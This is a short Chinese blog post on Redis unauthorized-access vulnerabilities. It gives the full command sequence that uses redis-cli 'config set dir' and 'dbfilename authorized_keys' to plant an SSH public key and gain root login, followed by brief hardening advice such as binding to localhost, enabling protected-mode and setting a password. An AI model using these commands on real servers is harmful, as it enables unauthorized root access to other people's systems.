redis 未授权访问漏洞和防范
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了redis 未授权访问漏洞和防范相关的知识,希望对你有一定的参考价值。
通过nmap扫描开放redis 6379端口
本机安装redis客户端,能连接远端redis数据库;(redis-cli)
本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pub
redis-cli -h 192.168.3.14 链接远程redis数据库
[[email protected] bin]# ./redis-cli -h 192.168.3.14
192.168.3.14:6379> keys *
1) "xxxx"
192.168.3.14:6379> config set dir /root/.ssh/
192.168.3.14:6379> config set dbfilename authorized_keys
192.168.3.14:6379> set xxxx "\n\n\n 拷贝公钥文件内容(id_rsa.pub)\n\n\n"
192.168.3.14:6379> save
ssh [email protected]——发现可以直接登录了;
防范建议:
redis4.0默认的redis.conf文件把6379默认绑定在127.0.0.1;这里设置允许谁能访问我的redis,不要开放0.0.0.0所有访问;
redis4.0 的redis.conf里的protected-mode设置成yes;
对redis启用密码认证 requirepass foobared
限制ssh登录
设置redis rename config
以上是关于redis 未授权访问漏洞和防范的主要内容,如果未能解决你的问题,请参考以下文章